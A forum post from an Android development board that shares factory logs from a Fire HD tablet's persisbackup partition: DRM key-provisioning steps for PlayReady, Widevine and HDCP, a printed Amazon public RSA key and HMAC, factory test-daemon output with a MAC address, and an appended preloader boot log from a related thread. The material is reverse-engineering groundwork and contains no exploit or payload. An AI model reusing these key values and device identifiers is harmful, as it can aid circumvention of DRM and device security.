persisbackup partition : - Fire HD 6 and 7 Android Development

While digging around, I found some interesting logs & scripts in *persisbackup* partition. I've zipped it, and attached the file below. This partition is actually mounted during the normal operation, but I've never looked inside before !
There are some log files which indicate how KB & DKB partitions are created. Also, there is a lot of stuff related to the various cryptographic keys. This could be useful to understand how Amazon is doing it. Unlocking the bootloader is a different matter altogether !
/persistbackup/provision_log
Code:
\10.128.128.240\combine\630\Aston-PVT_0000868630.bin
== Start KB_EKKB key provisioning at 2015-04-18-01:56 ==
2015-04-18 01:56:03 Try to install KB_EKKB
2015-04-18 01:56:03 Reading KB_EKKB from /data/key_provisioning/......
2015-04-18 01:56:03 KB_EKKB is found,try to install KB_EKKB!
2015-04-18 01:56:03 Start to process KB_EKKB...
2015-04-18 01:56:03
================================================
Provisioning with KB_EKKB
================================================
Try to get AEK from OTP...
Get AEK from OTP successfully...
Preparing parameters for signature verification...
Preparing parameters successfully...
Caculate KB_EKKB signature...
KB_EKKB signature caculate successfully...
Verify KB_EKKB signagure...
Verify KB_EKKB signagure successfully...
Decrypting KB_EKKB...
Decrypt KB_EKKB successfully...
Re-encrypt KB_EKKB...
Re-encrypt KB_EKKB successfully...
=============================
Provisioning KB_EKKB SUCCESS
=============================
2015-04-18 01:56:03 KB_EKKB process ok,write it to keyblock...
2015-04-18 01:56:03 KB_EKKB write to keyblock successfully...
2015-04-18 01:56:03 KB_EKKB install successfully!
== Device Serial Number: 0092000000000000 ==
== Finish KB_EKKB key provisioning at 2015-04-18-01:56 ==
== Start KB_PM key provisioning at 2015-04-18-01:56 ==
2015-04-18 01:56:03 Try to install KB_PM
2015-04-18 01:56:03 Reading KB_PM from /data/key_provisioning/......
2015-04-18 01:56:03 KB_PM is found,try to install KB_PM!
2015-04-18 01:56:03 Keyblock file do not has ekkb,try to find ekkb in keyblock...
2015-04-18 01:56:04 ekkb is found in keyblock!
2015-04-18 01:56:04
================================================
Provisioning with production DRM keys
================================================
Decrypt Kkb_pub......
Decrypt Kkb_pub successfully
Decrypt Kkb......
Decrypt Kkb successfully
Verify DRM Keyblock Signature......
Verify DRM Keyblock Signature successfully
Start to process divided drm keys......
3 DRM keys in Keyblock...
=========================
Provisioning PLAYREADY_BGROUPCERT...
=========================
Decrypt pre-encrypted PLAYREADY_BGROUPCERT...
Decrypt pre-encrypted PLAYREADY_BGROUPCERT successfully
Verify pre-encrypted PLAYREADY_BGROUPCERT signature...
Verify pre-encrypted PLAYREADY_BGROUPCERT signature successfully
Re-encrypt PLAYREADY_BGROUPCERT ...
Re-encrypt PLAYREADY_BGROUPCERT successfully
Generate PLAYREADY_BGROUPCERT signature...
Generate PLAYREADY_BGROUPCERT signature successfully
Provision PLAYREADY_BGROUPCERT successfully
=========================
Provisioning PLAYREADY_ZGPRIV...
=========================
Decrypt pre-encrypted PLAYREADY_ZGPRIV...
Decrypt pre-encrypted PLAYREADY_ZGPRIV successfully
Verify pre-encrypted PLAYREADY_ZGPRIV signature...
Verify pre-encrypted PLAYREADY_ZGPRIV signature successfully
Re-encrypt PLAYREADY_ZGPRIV ...
Re-encrypt PLAYREADY_ZGPRIV successfully
Generate PLAYREADY_ZGPRIV signature...
Generate PLAYREADY_ZGPRIV signature successfully
Provision PLAYREADY_ZGPRIV successfully
=========================
Provisioning LEK...
=========================
Decrypt pre-encrypted LEK...
Decrypt pre-encrypted LEK successfully
Verify pre-encrypted LEK signature...
Verify pre-encrypted LEK signature successfully
Re-encrypt LEK ...
Re-encrypt LEK successfully
Generate LEK signature...
Generate LEK signature successfully
Provision LEK successfully
All DRM keys is processed finished!
====================
Provisioning SUCCESS
====================
2015-04-18 01:56:04 Keyblock process ok,write it to keyblock...
2015-04-18 01:56:04 KB_PM install successfully!
== Device Serial Number: 0092000000000000 ==
== Finish KB_PM key provisioning at 2015-04-18-01:56 ==
== Start KB_PD key provisioning at 2015-04-18-01:56 ==
== Md5 checksum : 22423772e2417b219c96a9d3db6b513b KB_PD ==
2015-04-18 01:56:04 Keyblock file do not has ekkb,try to find ekkb in keyblock...
2015-04-18 01:56:04 ekkb is found in keyblock!
2015-04-18 01:56:04
================================================
Provisioning with production DRM keys
================================================
Decrypt Kkb_pub......
Decrypt Kkb_pub successfully
Decrypt Kkb......
Decrypt Kkb successfully
Verify DRM Keyblock Signature......
Verify DRM Keyblock Signature successfully
Start to process divided drm keys......
3 DRM keys in Keyblock...
=========================
Provisioning HDCP_1X_TX...
=========================
Decrypt pre-encrypted HDCP_1X_TX...
Decrypt pre-encrypted HDCP_1X_TX successfully
Verify pre-encrypted HDCP_1X_TX signature...
Verify pre-encrypted HDCP_1X_TX signature successfully
Re-encrypt HDCP_1X_TX ...
Re-encrypt HDCP_1X_TX successfully
Generate HDCP_1X_TX signature...
Generate HDCP_1X_TX signature successfully
Provision HDCP_1X_TX successfully
=========================
Provisioning WIDEVINE...
=========================
Decrypt pre-encrypted WIDEVINE...
Decrypt pre-encrypted WIDEVINE successfully
Verify pre-encrypted WIDEVINE signature...
Verify pre-encrypted WIDEVINE signature successfully
Re-encrypt WIDEVINE ...
Re-encrypt WIDEVINE successfully
Generate WIDEVINE signature...
Generate WIDEVINE signature successfully
Provision WIDEVINE successfully
=========================
Provisioning DEVICE_RSA_KEYPAIR...
=========================
Decrypt pre-encrypted DEVICE_RSA_KEYPAIR...
Decrypt pre-encrypted DEVICE_RSA_KEYPAIR successfully
Verify pre-encrypted DEVICE_RSA_KEYPAIR signature...
Verify pre-encrypted DEVICE_RSA_KEYPAIR signature successfully
Re-encrypt DEVICE_RSA_KEYPAIR ...
Re-encrypt DEVICE_RSA_KEYPAIR successfully
Generate DEVICE_RSA_KEYPAIR signature...
Generate DEVICE_RSA_KEYPAIR signature successfully
Provision DEVICE_RSA_KEYPAIR successfully
All DRM keys is processed finished!
====================
Provisioning SUCCESS
====================
2015-04-18 01:56:04 Keyblock process ok,write it to keyblock...
== Device Serial Number: 0092000000000000 ==
== Finish KB_PD key provisioning at 2015-04-18-01:56 ==
=========================
Decoding AMZN RSA Key...
=========================
Sep 4 2014 04:24:21 Successfully get_encrypt_drmkey DEVICE_RSA_KEYPAIR.
Sep 4 2014 04:24:21 Successfully get_encrypt_drmkey LEK.
Sep 4 2014 04:24:21 Successfully CreateSession TZ_TA_MEM_UUID.
Sep 4 2014 04:24:21 Successfully UREE_RegisterSharedmem shm_handle1.
Sep 4 2014 04:24:21 Successfully UREE_RegisterSharedmem shm_handle2.
Sep 4 2014 04:24:21 Successfully UREE_RegisterSharedmem shm_handle3.
Sep 4 2014 04:24:21 Successfully CreateSession TZ_TA_AMZN_KEY_UUID.
Sep 4 2014 04:24:21 Successfully UREE_TeeServiceCall TZCMD_AMZN_KEY_HMAC.
Sep 4 2014 04:24:21 The Amzn public RSA key is:
c7f2886b3eb53bad75263c0d2336512c
9f482138de3b7e65fe71fa89c4d2d338
ad5e262c05055c45f94f23f4a64a4154
66e5cedeb0743031d0638851a2bdeee8
d9d27061961b2ed03cb5be404790925c
4c0aa1304875be11b1607bac4700cb20
2f9be95993d1a711a77e4153b3256d86
000409cce8f63b0f5a29af62a6a13d8c
64635fc6a4b50e16f50e242478bae88a
0f9b53610c35ed80eef6827e75f89964
99cfdb26cc5779471a88270509320e84
213dbfffa8ad75050240018e6fe3e592
f9384237fa9d0c59555d0f2bf40353e6
6bc488b60fb17734f88c624bdb2a08f4
9a942fed5d8f8c17d1099830ffcb8d22
77bd29d549e7c3355172ebfaf70ef2e7
Sep 4 2014 04:24:21 The Amzn Key HMAC is:
7269a306a7ea0c0661e9626c8f02fac6
ddc678459026d6d2343328b2655aad39
/persistbackup/drmkey_operation.log
Code:
2015-04-18 01:56:03 Preparing for writing keyblock /dev/block/platform/mtk-msdc.0/by-name/KB.......
2015-04-18 01:56:03 Earsing keyblock case,keyblock /dev/block/platform/mtk-msdc.0/by-name/KB will be easred!
2015-04-18 01:56:03 Writing keyblock....
2015-04-18 01:56:03 Write keyblock successfully
2015-04-18 01:56:03 Preparing for writing keyblock /dev/block/platform/mtk-msdc.0/by-name/DKB.......
2015-04-18 01:56:03 Earsing keyblock case,keyblock /dev/block/platform/mtk-msdc.0/by-name/DKB will be easred!
2015-04-18 01:56:03 Writing keyblock....
2015-04-18 01:56:03 Write keyblock successfully
2015-04-18 01:56:03 Preparing for writing keyblock /dev/block/platform/mtk-msdc.0/by-name/KB.......
2015-04-18 01:56:03 Writing keyblock....
2015-04-18 01:56:03 Write keyblock successfully
2015-04-18 01:56:04 Preparing for wrting keyblock /dev/block/platform/mtk-msdc.0/by-name/KB.......
2015-04-18 01:56:04 Writing keyblock....
2015-04-18 01:56:04 Write keyblock successfully
2015-04-18 01:56:04 command is rm -f /data/key_provisioning//KBF_BIN!!!!
2015-04-18 01:56:04 Preparing for wrting keyblock /dev/block/platform/mtk-msdc.0/by-name/KB.......
2015-04-18 01:56:04 Writing keyblock....
2015-04-18 01:56:04 Write keyblock successfully
2015-04-18 01:56:04 command is rm -f /data/key_provisioning//KBF_BIN!!!!
This is not an Ariel EVT1 nor Aston proto.
All key blocks exist.
2015-04-18 02:43:01 Preparing for wrting keyblock /dev/block/platform/mtk-msdc.0/by-name/DKB.......
2015-04-18 02:43:01 Writing keyblock....
2015-04-18 02:43:01 Write keyblock successfully
2015-04-18 02:43:01 command is rm -f /data/key_provisioning//KBO_BIN!!!!
This is not an Ariel EVT1 nor Aston proto.
All key blocks exist.
This is not an Ariel EVT1 nor Aston proto.
All key blocks exist.
/persistbackup/.cmdd.log
Code:
File[main.cpp], Ln[8] [OUT_LOG]: CMDD STARTS.
File[main.cpp], Ln[8] [OUT_LOG]: CMDD STARTS.
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_station_env '1' '1' 'FQC' 'a95-PC' '00000' < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_station_env ====
FACTORY = Unknown
LINE = Unknown
STATION = Unknown
PC_HOST = Unknown
OP = Unknown
[04/18/2015 03:24:29] Test case starts
>>>>>>>>>>>>>>>>
<<<<<<<<<<<<<<<<
[04/18/2015 03:24:29] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_end_apk < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_end_apk ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:24:30] Test case starts
>>>>>>>>>>>>>>>>
BatteryMonitorActivity Ends
<<<<<<<<<<<<<<<<
[04/18/2015 03:24:30] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_battery_capacity < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_battery_capacity ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:24:32] Test case starts
>>>>>>>>>>>>>>>>
66
<<<<<<<<<<<<<<<<
[04/18/2015 03:24:32] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_time 20150418.032500 < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_time ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:24:34] Test case starts
>>>>>>>>>>>>>>>>
1429327500
<<<<<<<<<<<<<<<<
[04/18/2015 03:25:00] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[254] [OUT_LOG]: <<<<<<<< USER INPUT SHELL STDIN BY CMDD >>>>>>>>
File[cls_cmdd.cpp], Ln[255] [OUT_LOG]:
getprop ro.build.version.incremental \
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[20.4.5.2_user_452004220
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_idme mac_addr < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_idme ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:25:04] Test case starts
>>>>>>>>>>>>>>>>
mac_addr: 10AE6065840D
<<<<<<<<<<<<<<<<
[04/18/2015 03:25:04] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_camera_preview < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_camera_preview ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:25:06] Test case starts
>>>>>>>>>>>>>>>>
Starting: Intent { cmp=com.amazon.camera/.AmazonCameraActivity }
<<<<<<<<<<<<<<<<
[04/18/2015 03:25:08] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_station_env '1' '1' 'FQC' 'a95-PC' '00000' < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_station_env ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:10] Test case starts
>>>>>>>>>>>>>>>>
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:10] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_end_apk < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_end_apk ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:11] Test case starts
>>>>>>>>>>>>>>>>
BatteryMonitorActivity Ends
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:11] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_battery_capacity < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_battery_capacity ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:13] Test case starts
>>>>>>>>>>>>>>>>
66
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:13] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_time 20150418.032615 < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_time ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:15] Test case starts
>>>>>>>>>>>>>>>>
1429327575
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:15] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[254] [OUT_LOG]: <<<<<<<< USER INPUT SHELL STDIN BY CMDD >>>>>>>>
File[cls_cmdd.cpp], Ln[255] [OUT_LOG]:
getprop ro.build.version.incremental \
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[20.4.5.2_user_452004220
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_idme mac_addr < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_idme ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:19] Test case starts
>>>>>>>>>>>>>>>>
mac_addr: 10AE6065840D
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:19] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_camera_preview < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_camera_preview ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:21] Test case starts
>>>>>>>>>>>>>>>>
Starting: Intent { cmp=com.amazon.camera/.AmazonCameraActivity }
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:23] Test case ends
] stderr:[Warning: Activity not started, its current task has been brought to the front
] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_emmc_manfid Emmc_size < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_emmc_manfid ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:33] Test case starts
>>>>>>>>>>>>>>>>
8G
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:33] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_emmc_manfid Free < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_emmc_manfid ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:34] Test case starts
>>>>>>>>>>>>>>>>
4.6G
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:34] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_widevine < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_widevine ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:37] Test case starts
>>>>>>>>>>>>>>>>
widevine keybox is valid, WVL1 device
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:38] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_playready < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_playready ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:42] Test case starts
>>>>>>>>>>>>>>>>
Playready provisioning is valid
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:44] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_touch_cycle < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_touch_cycle ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:48] Test case starts
>>>>>>>>>>>>>>>>
Touch Stylus Test Pass
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:55] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_idme productid2 < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_idme ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:26:58] Test case starts
>>>>>>>>>>>>>>>>
productid2: 0121
<<<<<<<<<<<<<<<<
[04/18/2015 03:26:58] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_wrapper_color 300 serial 2 2 DA/BLACK/0,0,0 88/BLACK/0,0,0 A4/WHITE/255,255,255 A5/WHITE/255,255,255 A6/BLUSH/249,41,247 AD/BLUSH/249,41,247 A9/BLUE/36,17,74 AE/BLUE/36,17,74 B3/CAYENNE/243,29,38 B5/CAYENNE/243,29,38 B4/CITRON/181,246,76 B6/CITRON/181,246,76 92/BLACK/0,0,0 93/BLACK/0,0,0 63/WHITE/255,255,255 6B/WHITE/255,255,255 AF/CAYENNE/243,29,38 B1/CAYENNE/243,29,38 DF/BLUE/36,17,74 AB/BLUE/36,17,74 DE/BLUSH/249,41,247 AA/BLUSH/249,41,247 B0/CITRON/181,246,76 B2/CITRON/181,246,76 < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_wrapper_color ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:27:01] Test case starts
>>>>>>>>>>>>>>>>
call apk on 92/BLACK/0,0,0
APK runs OK, waiting for return
Wrapper Color Test Pass
<<<<<<<<<<<<<<<<
[04/18/2015 03:27:05] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_boot0_and_emmc_lock_check < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_boot0_and_emmc_lock_check ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 03:27:07] Test case starts
>>>>>>>>>>>>>>>>
boot0 successfully locked down.
card_lock_disable fail: flag=1
<<<<<<<<<<<<<<<<
[04/18/2015 03:27:08] Test case ends
] stderr:[] exit_code 0
File[main.cpp], Ln[8] [OUT_LOG]: CMDD STARTS.
File[main.cpp], Ln[8] [OUT_LOG]: CMDD STARTS.
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_station_env '1' '1' 'OBE' 'lakin_li_win79' 'lkkjj' < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_station_env ====
FACTORY = 1
LINE = 1
STATION = FQC
PC_HOST = a95-PC
OP = 00000
[04/18/2015 05:43:02] Test case starts
>>>>>>>>>>>>>>>>
<<<<<<<<<<<<<<<<
[04/18/2015 05:43:02] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_end_apk < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_end_apk ====
FACTORY = 1
LINE = 1
STATION = OBE
PC_HOST = lakin_li_win79
OP = lkkjj
[04/18/2015 05:43:03] Test case starts
>>>>>>>>>>>>>>>>
BatteryMonitorActivity Ends
<<<<<<<<<<<<<<<<
[04/18/2015 05:43:03] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_battery_capacity < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_battery_capacity ====
FACTORY = 1
LINE = 1
STATION = OBE
PC_HOST = lakin_li_win79
OP = lkkjj
[04/18/2015 05:43:04] Test case starts
>>>>>>>>>>>>>>>>
62
<<<<<<<<<<<<<<<<
[04/18/2015 05:43:04] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh -s FQC_set_time 20150418.054307 < /sbin/fqc/fqc.sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[==== TestCase: FQC_set_time ====
FACTORY = 1
LINE = 1
STATION = OBE
PC_HOST = lakin_li_win79
OP = lkkjj
[04/18/2015 05:43:06] Test case starts
>>>>>>>>>>>>>>>>
1429335787
<<<<<<<<<<<<<<<<
[04/18/2015 05:43:07] Test case ends
] stderr:[] exit_code 0
File[cls_cmdd.cpp], Ln[254] [OUT_LOG]: <<<<<<<< USER INPUT SHELL STDIN BY CMDD >>>>>>>>
File[cls_cmdd.cpp], Ln[255] [OUT_LOG]:
getprop ro.build.version.incremental \
File[cls_cmdd.cpp], Ln[59] [OUT_LOG]: cmd:[sh]
File[cls_cmdd.cpp], Ln[68] [OUT_LOG]: stdout:[20.4.5.2_user_452004220
] stderr:[] exit_code 0
File[main.cpp], Ln[8] [OUT_LOG]: CMDD STARTS.
@DoLooper, @kirito9, @sd_shadow, @Kramar111, @zeroepoch, @hwmod, @Tomsgt

Related

somthing intresting help unbrick

[PWRAP] pwrap_init_preloader
[PWRAP] pwrap_init
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=0 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=1 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=2 rdata=5AA5
[PWRAP] _pwrap_init_sidly [Read Test] pass,SIDLY=3 rdata=5AA5
[PMIC_WRAP]wrap_init pass,the return value=0.
pl pmic init start
pl pmic efuse start
pl pmic efuse BUCK trim
[0x1C8]=0xF802
[0x1CA]=0x807F
[0x20E]=0xE0
[0x260]=0xF0
[0x286]=0xF0
pl pmic efuse end
pl pmic en rst [0x126]=0x13
[0xE]=0x1
[0x540]=0xA0
Battery exist
[0xE]=0x1
[0x540]=0xA0
pl vm read [0x290]=0x50
pl vm set [0x290]=0x52
pl vm check [0x290]=0x52
pl pmic init done
[PLFM] Init I2C: OK(0)
[PLFM] Init PWRAP: OK(0)
[PLFM] Init PMIC: OK(0)
[PLFM] chip[CA00]
[I2C][PL] [i2c0 write] i2c transaction complate
[BLDR] Build Time: 20140218-141828
==== Dump RGU Reg ========
RGU MODE: 75
RGU LENGTH: FFE0
RGU STA: 40000000
RGU INTERVAL: FFF
RGU SWSYSRST: 0
==== Dump RGU Reg End ====
RGU: g_rgu_satus:2
mtk_wdt_mode_config mode value=35, tmp:22000030
PL RGU RST: ??
SW reset with bypass power key flag
Find bypass powerkey flag
mtk_wdt_mode_config mode value=70, tmp:22000071
kpd register for pmic set!
mt_usb_calibraion: input_reg = 0x0
mt_usb_calibraion: term_vref = 0x0, clkref = 0x0, vrt_vref = 0x0,
[RTC] bbpu = 0x5, con = 0x426
[RTC] irqsta = 0x0, pdn1 = 0x0, pdn2 = 0x201, spar0 = 0x40, spar1 = 0x800
[RTC] new_spare0 = 0x0, new_spare1 = 0x1, new_spare2 = 0x1, new_spare3 = 0x1
[RTC] bbpu = 0x5, con = 0x424
SW reset with bypass power key flag
SW reset with bypass power key flag
[PLFM] WDT reboot bypass power key!
p1 pmic read INT_RSV(bit7)[0x138][0x80]
[RTC] rtc_bbpu_power_on done
[SD0] Bus Width: 1
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0)
[SD0] Switch to High-Speed mode!
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0)
[SD0] Bus Width: 8
[SD0] Size: 3696 MB, Max.Speed: 52000 kHz, blklen(512), nblks(7569408), ro(0)
[SD0] Initialized
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0)
msdc_ett_offline_to_pl: size<2> m_id<0x90>
msdc <0> <HYNIX > <H4G1d>
msdc <1> <xxxxxx> <H4G1d>
msdc failed to find
*******EMMC_INFO*******
eMMC partition size(1 block = 512Bytes):
BOOT1:<4096> blocks
BOOT2:<4096> blocks
RPMB :<4096> blocks
GP1 :<0> blocks
GP2 :<0> blocks
GP3 :<0> blocks
GP4 :<0> blocks
USER :<7569408> blocks
*******EMMC_INFO*******
fw id len:1
found:1,i:1
[EMI] DDR2
[EMI] eMMC/NAND ID = 90,1,4A,48,34,47,31,64,4
[EMI] MDL number = 1
[MEM] 1066 MHZ
rank 0 coarse = 15
rank 0 fine = 48
10:| 0 0 1 1 1 0
opt_dle value:8
rank 1 coarse = 15
rank 1 fine = 48
10:| 0 0 1 1 1 0
opt_dle value:8
byte:0, (DQS,DQ)=(8,8)
byte:1, (DQS,DQ)=(8,A)
byte:2, (DQS,DQ)=(8,8)
byte:3, (DQS,DQ)=(8,A)
[EMI] DRAMC calibration passed
[EMI] DQSINCTL:50000
[MEM] complex R/W mem test pass
[PLFM] Init Boot Device: OK(0)
[ROM_INFO] 'v2','0x2700000','0x20000','0x46C0000','0x2C00'
[SEC_K] SML KEY AC = 0
[SEC_K] SBC_PUBK Found
[SEC] AES Legacy : 0
[SEC] SECCFG AC : 1
[SEC] read '0x2700000'
0x41,0x4E,0x44,0x5F,0x53,0x45,0x43,0x43,
[LIB] SecLib.a '20121226-155014'
[LIB] CFG read size '0x4000' '0x1860'
[LIB] Name = SOMC
[LIB] Config = 0x11, 0x11
0x31,0x41,0x35,0x35
0x6F679858
[LIB] HW DEC
0x49494949
[LIB] SEC CFG 'v3' exists
[LIB] Status = 0x43434343
[LIB] ty = 0 , ld = 0
[PART] Image with part header
[PART] name : LK
[PART] addr : FFFFFFFFh
[PART] size : 316772
[PART] magic: 58881688h
[PART] load "UBOOT" from 0x0000000003960200 (dev) to 0x81E00000 (mem) [SUCCESS]
[PART] load speed: 9374KB/s, 316772 bytes, 33ms
[LIB] HW DEC
[SECRO] secroimg '0x41414141'
[SECRO] secroimg '0x35353535'
[SECRO] factory mode enabled
[AUTHEN] rsa.N length = 1024 bytes
